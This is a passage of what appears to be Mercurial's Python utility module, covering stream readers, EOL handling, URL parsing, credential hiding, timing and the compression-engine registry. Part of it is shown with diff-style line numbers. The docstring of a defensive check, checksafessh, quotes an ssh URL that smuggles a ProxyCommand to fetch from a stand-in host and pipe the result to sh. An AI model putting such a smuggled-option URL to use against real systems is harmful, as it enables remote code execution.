        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrarily sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read up to ``l`` bytes of data from the iterator of chunks.
        Returns fewer than ``l`` bytes if the iterator runs dry.

        If the size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

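# Illustrative usage (a sketch, not part of the original module): chunkbuffer
# turns an iterator of unevenly sized chunks into a reader with exact read
# sizes:
#
#   >>> buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#   >>> buf.read(5)
#   'abcde'
#   >>> buf.read(10)   # only 3 bytes remain, so this is a short read
#   'fgh'
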
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, ``size``
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

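# Illustrative usage (a sketch, not part of the original module): capping a
# reader carves a fixed-size frame out of a stream without letting the
# consumer read past the frame boundary:
#
#   >>> fh = bytesio(b'0123456789')
#   >>> limited = cappedreader(fh, 4)
#   >>> limited.read()
#   '0123'
#   >>> limited.read(1)   # past the cap: treated as EOF
#   ''
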
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

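# Illustrative values (a sketch, not part of the original module): the first
# row whose threshold (multiplier * divisor) the value reaches selects the
# format string:
#
#   >>> bytecount(100)
#   '100 bytes'
#   >>> bytecount(4096)
#   '4.00 KB'
#   >>> bytecount(15 * (1 << 20))
#   '15.0 MB'
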
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

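# Illustrative usage (a sketch, not part of the original module): the regexp
# normalizes every EOL in one pass, and on LF platforms the tonativeeol /
# fromnativeeol pair resolves to the identity so the common case is free:
#
#   >>> tolf(b'a\r\nb\n')
#   'a\nb\n'
#   >>> tocrlf(b'a\nb\r\n')
#   'a\r\nb\r\n'
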
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ | buggy   | buggy           | okay
    # fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

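# Illustrative usage (a sketch, not part of the original module;
# ``process`` is a hypothetical consumer): wrapping a pipe keeps line
# iteration EINTR-safe on old CPython, while regular files take the
# unwrapped fast path:
#
#   for line in iterfile(procutil.stdin):
#       process(line)
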
def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows escaping the prefix by
    doubling it.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

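# Illustrative usage (a sketch, not part of the original module): with the
# escaped prefix br'\%' and escape_prefix=True, a doubled '%%' collapses to
# a literal '%' while mapped keys are substituted:
#
#   >>> interpolate(br'\%', {b'user': b'alice'}, b'hi %user, 100%%',
#   ...             escape_prefix=True)
#   'hi alice, 100%'
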
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

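# Illustrative usage (a sketch, not part of the original module): numeric
# strings short-circuit, anything else goes through the system services
# database:
#
#   >>> getport(b'8080')
#   8080
#   >>> getport(b'ssh')   # via getservbyname(); 22 on typical systems
#   22
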
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLs
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

2937
2943
2938 def isabs(self):
2944 def isabs(self):
2939 if self.scheme and self.scheme != 'file':
2945 if self.scheme and self.scheme != 'file':
2940 return True # remote URL
2946 return True # remote URL
2941 if hasdriveletter(self.path):
2947 if hasdriveletter(self.path):
2942 return True # absolute for our purposes - can't be joined()
2948 return True # absolute for our purposes - can't be joined()
2943 if self.path.startswith(br'\\'):
2949 if self.path.startswith(br'\\'):
2944 return True # Windows UNC path
2950 return True # Windows UNC path
2945 if self.path.startswith('/'):
2951 if self.path.startswith('/'):
2946 return True # POSIX-style
2952 return True # POSIX-style
2947 return False
2953 return False
2948
2954
2949 def localpath(self):
2955 def localpath(self):
2950 if self.scheme == 'file' or self.scheme == 'bundle':
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2951 path = self.path or '/'
2957 path = self.path or '/'
2952 # For Windows, we need to promote hosts containing drive
2958 # For Windows, we need to promote hosts containing drive
2953 # letters to paths with drive letters.
2959 # letters to paths with drive letters.
2954 if hasdriveletter(self._hostport):
2960 if hasdriveletter(self._hostport):
2955 path = self._hostport + '/' + self.path
2961 path = self._hostport + '/' + self.path
2956 elif (self.host is not None and self.path
2962 elif (self.host is not None and self.path
2957 and not hasdriveletter(path)):
2963 and not hasdriveletter(path)):
2958 path = '/' + path
2964 path = '/' + path
2959 return path
2965 return path
2960 return self._origpath
2966 return self._origpath
2961
2967
2962 def islocal(self):
2968 def islocal(self):
2963 '''whether localpath will return something that posixfile can open'''
2969 '''whether localpath will return something that posixfile can open'''
2964 return (not self.scheme or self.scheme == 'file'
2970 return (not self.scheme or self.scheme == 'file'
2965 or self.scheme == 'bundle')
2971 or self.scheme == 'bundle')
2966
2972
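# Illustrative sketch (not from the original source): how the class above
# behaves on a concrete value, following the doctests in __bytes__:
#
#     u = url(b'http://joe:xyzzy@example.com/repo')
#     bytes(u)      # -> 'http://joe:xyzzy@example.com/repo'
#     u.authinfo()  # -> ('http://example.com/repo',
#                   #     (None, ('http://example.com/repo', 'example.com'),
#                   #      'joe', 'xyzzy'))
#     u.isabs()     # -> True (a non-'file' scheme counts as remote)
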
def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

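# Illustrative sketch (not from the original source), exercising the
# helpers above:
#
#     hidepassword(b'http://joe:xyzzy@example.com/')
#         # -> 'http://joe:***@example.com/'
#     removeauth(b'http://joe:xyzzy@example.com/')
#         # -> 'http://example.com/'
#     checksafessh(b'ssh://-oProxyCommand=evil/x')  # raises error.Abort
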
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

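# How the table above behaves (a sketch, assuming the unitcountfn()
# semantics defined earlier in this module: each row is
# (multiplier, divisor, format), and the first row whose threshold
# multiplier * divisor the value meets is used):
#
#     timecount(1.5)    # -> '1.500 s'  (matches the (1, 1, ...) row)
#     timecount(0.004)  # -> '4.000 ms' (matches the (1, 0.001, ...) row)
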
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

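# Illustrative usage sketch (not from the original source):
#
#     with timedcm('loading %s', name) as stats:
#         expensive_work()
#     # stats.elapsed now holds the wall time in seconds; bytes(stats)
#     # renders it through timecount(), e.g. '1.500 s'.
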
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

        @util.timed
        def foo(a, b, c):
            pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
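# Note on ordering (an observation, not in the original source): sizetoint()
# below tries suffixes in tuple order with endswith(), so the two-letter
# units must appear before the bare 'b'; otherwise b'2kb' would be cut at
# 'b' and parsed as 2 bytes.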

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

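# Illustrative usage sketch (hypothetical source names, not from the
# original source):
#
#     h = hooks()
#     h.add('zzz-ext', lambda x: x * 2)
#     h.add('aaa-ext', lambda x: x + 1)
#     h(3)  # -> [4, 6]: hooks run sorted by source name, 'aaa-ext' first
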
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

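# Illustrative usage sketch (not from the original source):
#
#     debugstacktrace('checkpoint', skip=1)
#     # writes 'checkpoint at:' plus the formatted call stack to stderr,
#     # flushing stdout first so the output is not interleaved.
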
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

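# Illustrative sketch (not from the original source):
#
#     list(finddirs(b'a/b/c'))  # -> [b'a/b', b'a'], deepest ancestor first
#
#     d = dirs([b'a/b/c', b'a/b/d'])
#     # addpath() stops at the first ancestor already present, so the
#     # multiset records {b'a/b': 2, b'a': 1}; b'a/b' in d is True.
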
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # Only register an external-facing name if one was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

